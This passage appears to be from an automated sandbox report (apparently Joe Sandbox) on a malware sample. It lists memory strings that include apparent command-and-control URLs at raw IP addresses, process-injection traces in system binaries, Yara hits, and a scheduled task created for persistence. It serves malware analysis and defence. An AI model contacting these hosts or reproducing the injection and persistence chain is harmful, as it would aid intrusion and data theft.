Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.phps
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.phpsF
Source: Publication.0.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Publication.0.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Publication.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Publication.0.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: J2NWKU2oJi.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Publication.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Publication.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Publication.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Publication.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Publication.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: Pleasure.pif, 0000000A.00000000.1724862263.0000000000219000.00000002.00000001.01000000.00000006.sdmp, Publication.0.dr, Pleasure.pif.1.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: dialer.exe, 00000010.00000002.2280099668.00000000027AC000.00000004.00000010.00020000.00000000.sdmp, dialer.exe, 00000010.00000002.2280467763.0000000002E98000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, OpenWith.exe, 00000014.00000003.2380401073.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2388372359.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2383846923.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2382259358.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2379080486.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2381455788.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2330137003.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2377146496.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2380016439.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000002.2584550230.000001BD7778C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2376868468.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2378806137.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2518893814.000001BD77785000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2580212347.000001BD7778B000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2388588718.000001BD77786000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000002.2583114275.000001BD75700000.00000040.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2378242743.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2386577450.000001BD77781000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://94.156.10.37:2036/efc85e6acdfc3a785/1evgkhav.3ltvh
Source: dialer.exe, 00000010.00000002.2280099668.00000000027AC000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://94.156.10.37:2036/efc85e6acdfc3a785/1evgkhav.3ltvhD
Source: dialer.exe, 00000010.00000002.2280467763.0000000002E98000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000002.2583114275.000001BD75700000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://94.156.10.37:2036/efc85e6acdfc3a785/1evgkhav.3ltvhkernelbasentdllkernel32GetProcessMitigatio
Source: OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: OpenWith.exe, 00000014.00000003.2387709304.000001BD77943000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.com
Source: OpenWith.exe, 00000014.00000003.2387709304.000001BD77943000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com
Source: OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: OpenWith.exe, 00000014.00000002.2583993168.000001BD776C7000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2580503855.000001BD776C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: OpenWith.exe, 00000014.00000003.2388299627.000001BD776F8000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2388098872.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mic
Source: OpenWith.exe, 00000014.00000003.2379186659.000001BD776D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office
Source: OpenWith.exe, 00000014.00000003.2436109596.000001BD77774000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-21
Source: OpenWith.exe, 00000014.00000003.2378806137.000001BD776C4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2381455788.000001BD776D5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2378601917.000001BD77A00000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2379297840.000001BD77999000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2412338349.000001BD77770000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2386577450.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2383846923.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2436178442.000001BD776AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: OpenWith.exe, 00000014.00000003.2378645142.000001BD77974000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: OpenWith.exe, 00000014.00000003.2381455788.000001BD776D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016y
Source: OpenWith.exe, 00000014.00000003.2381455788.000001BD776D5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2378601917.000001BD77A00000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2379297840.000001BD77999000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2412338349.000001BD77770000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2386577450.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2378806137.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2383846923.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: OpenWith.exe, 00000014.00000003.2380609962.000001BD776DA000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2382259358.000001BD776DA000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2380401073.000001BD776D4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2384215921.000001BD776E0000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2381455788.000001BD776D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e171
Source: OpenWith.exe, 00000014.00000003.2378645142.000001BD77974000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: OpenWith.exe, 00000014.00000002.2583923900.000001BD776AA000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2387896301.000001BD776A4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2412273638.000001BD776A8000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2382101034.000001BD776A2000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2436178442.000001BD776AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17N-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP
Source: OpenWith.exe, 00000014.00000003.2379186659.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2378806137.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17t.mc_id=EnterPK201694ba2e0b-6
Source: Publication.0.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Publication.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Publication.0.dr	String found in binary or memory: https://www.globalsign.com/repository/06
Source: OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\J2NWKU2oJi.exe

Code function: 0_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004056DE

Source: dialer.exe, 00000010.00000003.2204938380.0000000005080000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: DirectInput8Create

memstr_b762d6a8-3

Source: dialer.exe, 00000010.00000003.2204938380.0000000005080000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_f8d2a4a0-4

Source: Yara match	File source: 16.3.dialer.exe.5080000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.dialer.exe.4e60000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.dialer.exe.5080000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.dialer.exe.4e60000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.dialer.exe.4e60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000003.2204938380.0000000005080000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2204492653.0000000004E60000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dialer.exe PID: 796, type: MEMORYSTR

Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_000001BD758630C7 RtlAllocateHeap,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,RtlDeleteBoundaryDescriptor,RtlDeleteBoundaryDescriptor,	20_3_000001BD758630C7
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B638A600 NtAcceptConnectPort,	20_3_00007DF4B638A600
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B638A540 NtAcceptConnectPort,	20_3_00007DF4B638A540
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B638A2B0 NtAcceptConnectPort,	20_3_00007DF4B638A2B0
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B638B088 NtAcceptConnectPort,NtAcceptConnectPort,	20_3_00007DF4B638B088
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B638B154 NtAcceptConnectPort,NtAcceptConnectPort,	20_3_00007DF4B638B154
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B6388D94 NtAcceptConnectPort,	20_3_00007DF4B6388D94
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B6389F40 NtAcceptConnectPort,	20_3_00007DF4B6389F40
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B6388C08 NtAcceptConnectPort,	20_3_00007DF4B6388C08
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B6388C90 NtAcceptConnectPort,	20_3_00007DF4B6388C90
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B6389CA0 _calloc_dbg,NtAcceptConnectPort,	20_3_00007DF4B6389CA0
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B6388A40 NtAcceptConnectPort,	20_3_00007DF4B6388A40
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B6389AF4 _malloc_dbg,NtAcceptConnectPort,NtAcceptConnectPort,??3@YAXPEAX@Z,	20_3_00007DF4B6389AF4
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B6388AFC NtAcceptConnectPort,	20_3_00007DF4B6388AFC
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_2_000001BD75701A90 NtAcceptConnectPort,NtAcceptConnectPort,RtlAddVectoredExceptionHandler,	20_2_000001BD75701A90
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_2_000001BD75700AC8 NtAcceptConnectPort,NtAcceptConnectPort,	20_2_000001BD75700AC8
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_2_000001BD757015AC NtAcceptConnectPort,	20_2_000001BD757015AC
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_2_000001BD75701CD0 RtlAllocateHeap,NtAcceptConnectPort,FindCloseChangeNotification,	20_2_000001BD75701CD0
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: 22_2_00CFDFE7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,	22_2_00CFDFE7
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 23_2_00A6DFE7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,	23_2_00A6DFE7
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 24_2_00A6DFE7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,	24_2_00A6DFE7

Source: C:\Users\user\Desktop\J2NWKU2oJi.exe

Code function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040352D

Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe

File created: C:\Windows\Tasks\Dctooux.job

Jump to behavior

Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Code function: 0_2_0040755C	0_2_0040755C
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Code function: 0_2_00406D85	0_2_00406D85
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_000001BD75861BA6	20_3_000001BD75861BA6
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_000001BD75862C3C	20_3_000001BD75862C3C
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_000001BD75864A38	20_3_000001BD75864A38
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_000001BD75865E7C	20_3_000001BD75865E7C
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_000001BD7586557C	20_3_000001BD7586557C
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_000001BD758658FC	20_3_000001BD758658FC
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_000001BD758624F7	20_3_000001BD758624F7
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_000001BD7586279C	20_3_000001BD7586279C
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B6397318	20_3_00007DF4B6397318
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B6375BD8	20_3_00007DF4B6375BD8
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B637D688	20_3_00007DF4B637D688
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B63FB68C	20_3_00007DF4B63FB68C
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B6448750	20_3_00007DF4B6448750
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B64546F8	20_3_00007DF4B64546F8
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B64483B8	20_3_00007DF4B64483B8
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B64473A0	20_3_00007DF4B64473A0
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B63AC45C	20_3_00007DF4B63AC45C
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B63DA3F4	20_3_00007DF4B63DA3F4
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B64593FC	20_3_00007DF4B64593FC
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B636E414	20_3_00007DF4B636E414
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B63B8534	20_3_00007DF4B63B8534
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B63CF4FC	20_3_00007DF4B63CF4FC
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B64411BC	20_3_00007DF4B64411BC
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B64541DC	20_3_00007DF4B64541DC
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B6448238	20_3_00007DF4B6448238
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B63AD210	20_3_00007DF4B63AD210
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B6373314	20_3_00007DF4B6373314
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B63C6F78	20_3_00007DF4B63C6F78
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B63B6FA0	20_3_00007DF4B63B6FA0
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B643C01C	20_3_00007DF4B643C01C
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B64040A0	20_3_00007DF4B64040A0
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B63CB094	20_3_00007DF4B63CB094
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B6443DE0	20_3_00007DF4B6443DE0
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B63B9E68	20_3_00007DF4B63B9E68
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B637BEC4	20_3_00007DF4B637BEC4
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B63ACEC4	20_3_00007DF4B63ACEC4
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B6459F40	20_3_00007DF4B6459F40
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B644CF3C	20_3_00007DF4B644CF3C
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B63D6F20	20_3_00007DF4B63D6F20
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B63B8BE8	20_3_00007DF4B63B8BE8
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B6370C44	20_3_00007DF4B6370C44
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B638EC44	20_3_00007DF4B638EC44
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B6361BFC	20_3_00007DF4B6361BFC
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B6447CF4	20_3_00007DF4B6447CF4
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B63BA9C4	20_3_00007DF4B63BA9C4
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B63C6A10	20_3_00007DF4B63C6A10
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B6364A14	20_3_00007DF4B6364A14
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B63B4A14	20_3_00007DF4B63B4A14
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B63C6B20	20_3_00007DF4B63C6B20
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B63A17C4	20_3_00007DF4B63A17C4
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B63AC7E8	20_3_00007DF4B63AC7E8
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B63877A0	20_3_00007DF4B63877A0
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B63C6834	20_3_00007DF4B63C6834
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B637D850	20_3_00007DF4B637D850
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B63B7860	20_3_00007DF4B63B7860
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B643780C	20_3_00007DF4B643780C
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B64478D8	20_3_00007DF4B64478D8
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B64458AC	20_3_00007DF4B64458AC
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_3_00007DF4B63AF954	20_3_00007DF4B63AF954
Source: C:\Windows\System32\OpenWith.exe	Code function: 20_2_000001BD75700C5C	20_2_000001BD75700C5C
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: 22_2_00D240F0	22_2_00D240F0
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: 22_2_00D02263	22_2_00D02263
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: 22_2_00D28429	22_2_00D28429
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: 22_2_00D24588	22_2_00D24588
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: 22_2_00D02A52	22_2_00D02A52
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: 22_2_00D28B7B	22_2_00D28B7B
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: 22_2_00D28C9B	22_2_00D28C9B
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: 22_2_00CE4FE0	22_2_00CE4FE0
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: 22_2_00D192A3	22_2_00D192A3
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: 22_2_00D05241	22_2_00D05241
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: 22_2_00CEF420	22_2_00CEF420
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: 22_2_00D075E2	22_2_00D075E2
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe	Code function: 22_2_00D29FE0	22_2_00D29FE0
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 23_2_00A940F0	23_2_00A940F0
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 23_2_00A72263	23_2_00A72263
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 23_2_00A98429	23_2_00A98429
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 23_2_00A94588	23_2_00A94588
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 23_2_00A72A52	23_2_00A72A52
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 23_2_00A98B7B	23_2_00A98B7B
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 23_2_00A98C9B	23_2_00A98C9B
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 23_2_00A5EFB0	23_2_00A5EFB0
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 23_2_00A54FE0	23_2_00A54FE0
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 23_2_00A892A3	23_2_00A892A3
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 23_2_00A75241	23_2_00A75241
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 23_2_00A5F420	23_2_00A5F420
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 23_2_00A775E2	23_2_00A775E2
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 23_2_00A99FE0	23_2_00A99FE0
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 24_2_00A59DA0	24_2_00A59DA0
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 24_2_00A940F0	24_2_00A940F0
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 24_2_00A892A3	24_2_00A892A3
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 24_2_00A72263	24_2_00A72263
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 24_2_00A75241	24_2_00A75241
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 24_2_00A98429	24_2_00A98429
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 24_2_00A94588	24_2_00A94588
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 24_2_00A775E2	24_2_00A775E2
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 24_2_00A72A52	24_2_00A72A52
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 24_2_00A98B7B	24_2_00A98B7B
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 24_2_00A98C9B	24_2_00A98C9B
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 24_2_00A54FE0	24_2_00A54FE0
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe	Code function: 24_2_00A99FE0	24_2_00A99FE0

Source: Joe Sandbox View

